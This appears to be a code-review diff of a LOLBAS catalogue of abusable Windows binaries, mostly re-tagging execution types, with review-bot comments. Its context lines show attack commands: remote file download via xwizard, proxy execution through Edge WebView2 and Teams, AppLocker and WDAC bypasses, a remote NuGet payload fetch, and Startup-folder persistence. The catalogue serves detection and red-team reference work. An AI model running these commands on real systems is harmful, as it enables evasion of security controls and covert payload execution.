OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: DLL - Execute: COM
- Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache. Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache.
Usecase: Download file from Internet Usecase: Download file from Internet

View File

@ -21,7 +21,7 @@ Commands:
MitreID: T1218.015 MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: CMD
- Command: msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher="calc.exe" - Command: msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher="calc.exe"
Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.
Usecase: Proxy execution of binary Usecase: Proxy execution of binary
@ -30,7 +30,7 @@ Commands:
MitreID: T1218.015 MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: CMD
- Command: msedgewebview2.exe --no-sandbox --renderer-cmd-prefix="calc.exe" - Command: msedgewebview2.exe --no-sandbox --renderer-cmd-prefix="calc.exe"
Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.
Usecase: Proxy execution of binary Usecase: Proxy execution of binary
@ -39,7 +39,7 @@ Commands:
MitreID: T1218.015 MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: CMD
Full_Path: Full_Path:
- Path: C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe - Path: C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe
Detection: Detection:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 11 OperatingSystem: Windows 11
Tags: Tags:
- Execute: EXE - Execute: CMD
Full_Path: Full_Path:
- Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_<version_packageid>\wt.exe - Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_<version_packageid>\wt.exe
Detection: Detection:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: URL
Full_Path: Full_Path:
- Path: c:\windows\system32\ieframe.dll - Path: c:\windows\system32\ieframe.dll
- Path: c:\windows\syswow64\ieframe.dll - Path: c:\windows\syswow64\ieframe.dll

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: URL
Full_Path: Full_Path:
- Path: c:\windows\system32\shdocvw.dll - Path: c:\windows\system32\shdocvw.dll
- Path: c:\windows\syswow64\shdocvw.dll - Path: c:\windows\syswow64\shdocvw.dll

View File

@ -21,7 +21,7 @@ Commands:
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: URL
- Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e - Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
Description: Launch an executable by calling OpenURL. Description: Launch an executable by calling OpenURL.
Usecase: Load an executable payload by specifying the file protocol handler (obfuscated). Usecase: Load an executable payload by specifying the file protocol handler (obfuscated).

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1216 MitreID: T1216
OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
Tags: Tags:
- Execute: .NetDLL - Execute: DLL (.NET)
Full_Path: Full_Path:
- Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1
Code_Sample: Code_Sample:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1216 MitreID: T1216
OperatingSystem: Windows 10 OperatingSystem: Windows 10
Tags: Tags:
- Execute: Powershell - Execute: PowerShell
Full_Path: Full_Path:
- Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
- Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1

View File

@ -12,7 +12,6 @@ Commands:
MitreID: T1216 MitreID: T1216
OperatingSystem: Windows 10 OperatingSystem: Windows 10
Tags: Tags:
- Execute: EXE
- Execute: CMD - Execute: CMD
Full_Path: Full_Path:
- Path: C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 - Path: C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1216.002 MitreID: T1216.002
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Execute: Powershell - Execute: PowerShell
Full_Path: Full_Path:
- Path: C:\Windows\System32\SyncAppvPublishingServer.vbs - Path: C:\Windows\System32\SyncAppvPublishingServer.vbs
Detection: Detection:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1216 MitreID: T1216
OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
Tags: Tags:
- Execute: .NetDLL - Execute: DLL (.NET)
Full_Path: Full_Path:
- Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1
Code_Sample: Code_Sample:

View File

@ -32,8 +32,7 @@ Commands:
MitreID: T1220 MitreID: T1220
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Execute: CMD - Execute: XSL
- Execute: Remote
Full_Path: Full_Path:
- Path: C:\Windows\System32\winrm.vbs - Path: C:\Windows\System32\winrm.vbs
- Path: C:\Windows\SysWOW64\winrm.vbs - Path: C:\Windows\SysWOW64\winrm.vbs
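Review bot: Dropping `- Execute: Remote` here is a semantic change, not a rename like the rest of this commit. winrm.vbs issues WS-Management calls that can be pointed at a remote host, and the hunk (`@ -32,8 +32,7 @@`) shows only this one Tags block, so confirm none of the file's remaining entries rely on a remote variant before removing the tag. Elsewhere in this commit (Update.exe) `Remote` is kept next to the new primary tag, which suggests `XSL` plus `Remote` is the consistent pair if the technique still works against a remote target.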

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows OperatingSystem: Windows
Tags: Tags:
- Execute: .NetDLL - Execute: DLL (.NET)
- Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll - Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll
Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name. Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name.
Usecase: Local execution of managed code to bypass AppLocker. Usecase: Local execution of managed code to bypass AppLocker.
@ -21,7 +21,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows OperatingSystem: Windows
Tags: Tags:
- Execute: .NetDLL - Execute: DLL (.NET)
Full_Path: Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 10 OperatingSystem: Windows 10
Tags: Tags:
- Execute: Powershell - Execute: PowerShell
- Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\temp\" 0 1 - Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\temp\" 0 1
Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully
Usecase: Execute a provided EXE Usecase: Execute a provided EXE
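Review bot: The entry that begins on the last lines of this hunk (`Command: AgentExecutor.exe -powershell ...`, `Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully`, `Usecase: Execute a provided EXE`) is a search-order hijack that runs an arbitrary binary, not PowerShell script execution. Its own Tags block falls outside the hunk; check that it was changed to `CMD` (the value this commit uses for arbitrary executable launches) rather than left as `Powershell`, which this hunk only re-cases for the preceding entry.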

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows OperatingSystem: Windows
Tags: Tags:
- Execute: Csharp - Execute: CSharp
Full_Path: Full_Path:
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe - Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe
- Path: c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe - Path: c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows OperatingSystem: Windows
Tags: Tags:
- Execute: EXE - Execute: CMD
Full_Path: Full_Path:
- Path: C:\Program Files (x86)\Microsoft\DefaultPack\DefaultPack.exe - Path: C:\Program Files (x86)\Microsoft\DefaultPack\DefaultPack.exe
Code_Sample: Code_Sample:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows 7 and up with VS/VScode installed OperatingSystem: Windows 7 and up with VS/VScode installed
Tags: Tags:
- Execute: EXE - Execute: CMD
- Command: devtoolslauncher.exe LaunchForDebug [PATH_TO_BIN] "argument here" test - Command: devtoolslauncher.exe LaunchForDebug [PATH_TO_BIN] "argument here" test
Description: The above binary will execute other binary. Description: The above binary will execute other binary.
Usecase: Execute any binary with given arguments. Usecase: Execute any binary with given arguments.
@ -21,7 +21,7 @@ Commands:
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows 7 and up with VS/VScode installed OperatingSystem: Windows 7 and up with VS/VScode installed
Tags: Tags:
- Execute: EXE - Execute: CMD
Full_Path: Full_Path:
- Path: 'c:\windows\system32\devtoolslauncher.exe' - Path: 'c:\windows\system32\devtoolslauncher.exe'
Code_Sample: Code_Sample:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows OperatingSystem: Windows
Tags: Tags:
- Execute: Csharp - Execute: CSharp
Full_Path: Full_Path:
- Path: no default - Path: no default
Code_Sample: Code_Sample:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 7 and up with .NET installed OperatingSystem: Windows 7 and up with .NET installed
Tags: Tags:
- Execute: .NetDLL - Execute: DLL (.NET)
- Command: dotnet.exe [PATH_TO_DLL] - Command: dotnet.exe [PATH_TO_DLL]
Description: dotnet.exe will execute any DLL. Description: dotnet.exe will execute any DLL.
Usecase: Execute DLL Usecase: Execute DLL
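Review bot: The context line `Description: dotnet.exe will execute any DLL.` overstates the technique; dotnet.exe loads a managed .NET assembly with an entry point, which is exactly the distinction the new `DLL (.NET)` tag is drawing. Since this entry is being re-tagged anyway, tighten the description to say a managed assembly so the tag and the prose agree.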
@ -21,7 +21,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 7 and up with .NET installed OperatingSystem: Windows 7 and up with .NET installed
Tags: Tags:
- Execute: .NetDLL - Execute: DLL (.NET)
- Command: dotnet.exe fsi - Command: dotnet.exe fsi
Description: dotnet.exe will open a console which allows for the execution of arbitrary F# commands Description: dotnet.exe will open a console which allows for the execution of arbitrary F# commands
Usecase: Execute arbitrary F# code Usecase: Execute arbitrary F# code
@ -30,7 +30,7 @@ Commands:
MitreID: T1059 MitreID: T1059
OperatingSystem: Windows 10 and up with .NET SDK installed OperatingSystem: Windows 10 and up with .NET SDK installed
Tags: Tags:
- Execute: Fsharp - Execute: FSharp
- Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ] - Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ]
Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code
Usecase: Execute code bypassing AWL Usecase: Execute code bypassing AWL
@ -39,7 +39,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 10 and up with .NET Core installed OperatingSystem: Windows 10 and up with .NET Core installed
Tags: Tags:
- Execute: CSProj - Execute: CSharp
Full_Path: Full_Path:
- Path: 'C:\Program Files\dotnet\dotnet.exe' - Path: 'C:\Program Files\dotnet\dotnet.exe'
Detection: Detection:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1059 MitreID: T1059
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Tags: Tags:
- Execute: Fsharp - Execute: FSharp
- Command: fsi.exe - Command: fsi.exe
Description: Execute F# code via interactive command line Description: Execute F# code via interactive command line
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
@ -21,7 +21,7 @@ Commands:
MitreID: T1059 MitreID: T1059
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Tags: Tags:
- Execute: Fsharp - Execute: FSharp
Full_Path: Full_Path:
- Path: C:\Program Files\dotnet\sdk\<version>\FSharp\fsi.exe - Path: C:\Program Files\dotnet\sdk\<version>\FSharp\fsi.exe
- Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1059 MitreID: T1059
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Tags: Tags:
- Execute: Fsharp - Execute: FSharp
- Command: fsianycpu.exe - Command: fsianycpu.exe
Description: Execute F# code via interactive command line Description: Execute F# code via interactive command line
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
@ -21,7 +21,7 @@ Commands:
MitreID: T1059 MitreID: T1059
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Tags: Tags:
- Execute: Fsharp - Execute: FSharp
Full_Path: Full_Path:
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe
Code_Sample: Code_Sample:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows OperatingSystem: Windows
Tags: Tags:
- Execute: Csharp - Execute: CSharp
- Command: rcsi.exe bypass.csx - Command: rcsi.exe bypass.csx
Description: Use embedded C# within the csx script to execute the code. Description: Use embedded C# within the csx script to execute the code.
Usecase: Local execution of arbitrary C# code stored in local CSX file. Usecase: Local execution of arbitrary C# code stored in local CSX file.
@ -21,7 +21,7 @@ Commands:
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows OperatingSystem: Windows
Tags: Tags:
- Execute: Csharp - Execute: CSharp
Full_Path: Full_Path:
- Path: no default - Path: no default
Code_Sample: Code_Sample:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows OperatingSystem: Windows
Tags: Tags:
- Execute: Powershell - Execute: PowerShell
Full_Path: Full_Path:
- Path: C:\Program files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe - Path: C:\Program files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe
- Path: C:\Program files (x86)\Microsoft SQL Server\110\Tools\Binn\sqlps.exe - Path: C:\Program files (x86)\Microsoft SQL Server\110\Tools\Binn\sqlps.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows OperatingSystem: Windows
Tags: Tags:
- Execute: Powershell - Execute: PowerShell
Full_Path: Full_Path:
- Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe - Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe
Code_Sample: Code_Sample:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218.015 MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Execute: Javascript - Execute: Node.JS
- Command: teams.exe - Command: teams.exe
Description: Generate JavaScript payload and package.json, archive in ASAR file and save to "%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app.asar" before executing. Description: Generate JavaScript payload and package.json, archive in ASAR file and save to "%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app.asar" before executing.
Usecase: Execute JavaScript code Usecase: Execute JavaScript code
@ -21,7 +21,7 @@ Commands:
MitreID: T1218.015 MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Execute: Javascript - Execute: Node.JS
- Command: teams.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&" - Command: teams.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&"
Description: Teams spawns cmd.exe as a child process of teams.exe and executes the ping command Description: Teams spawns cmd.exe as a child process of teams.exe and executes the ping command
Usecase: Executes a process under a trusted Microsoft signed binary Usecase: Executes a process under a trusted Microsoft signed binary
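Review bot: The entry that starts at the end of this hunk (`teams.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&"`, `Description: Teams spawns cmd.exe as a child process of teams.exe`) is a child-process launch through a Chromium command-line switch, not JavaScript execution, so its Tags block (outside the hunk) should be `CMD` rather than `Node.JS`; only the `app.asar` entry above it actually runs a JavaScript payload. Separately, the product is spelled `Node.js`; if the tag is meant to mirror the name, `Node.JS` will read as a typo in the rendered filter list.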

View File

@ -79,7 +79,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags: Tags:
- Execute: Nuget - Execute: CMD
- Execute: Remote - Execute: Remote
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder - Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
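Review bot: Replacing `Nuget` with `CMD` removes the only tag that named the package format these entries depend on; the adjacent entry (`Update.exe --updateRollback=\\remoteserver\payloadFolder`, described as looking for a RELEASES file and installing the nuget package via SAMBA) shows the Update.exe techniques are driven by a RELEASES file and a NuGet package rather than a bare command line. If `Nuget` is being retired from the vocabulary, make sure each affected Description still states the packaging requirement, and keep the `Remote` tag on every entry in this file that fetches from a UNC path, as this hunk does.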
@ -109,7 +109,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags: Tags:
- Execute: EXE - Execute: CMD
- Command: Update.exe --createShortcut=payload.exe -l=Startup - Command: Update.exe --createShortcut=payload.exe -l=Startup
Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it. Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it.
Usecase: Execute binary Usecase: Execute binary

View File

@ -21,7 +21,7 @@ Commands:
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: CMD
Full_Path: Full_Path:
- Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Team Tools\DiagnosticsHub\Collector\VSDiagnostics.exe - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Team Tools\DiagnosticsHub\Collector\VSDiagnostics.exe
Detection: Detection:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Tags: Tags:
- Execute: Csharp - Execute: XOML
Full_Path: Full_Path:
- Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe
Code_Sample: Code_Sample:

View File

@ -21,7 +21,7 @@ Commands:
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 10, Windows Server 2019, Windows 11 OperatingSystem: Windows 10, Windows Server 2019, Windows 11
Tags: Tags:
- Execute: EXE - Execute: CMD
- Command: wsl.exe --exec bash -c "<command>" - Command: wsl.exe --exec bash -c "<command>"
Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u <username>`) on the default WSL distro (unless stated otherwise using `-d <distro name>`) Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u <username>`) on the default WSL distro (unless stated otherwise using `-d <distro name>`)
Usecase: Performs execution of arbitrary Linux commands. Usecase: Performs execution of arbitrary Linux commands.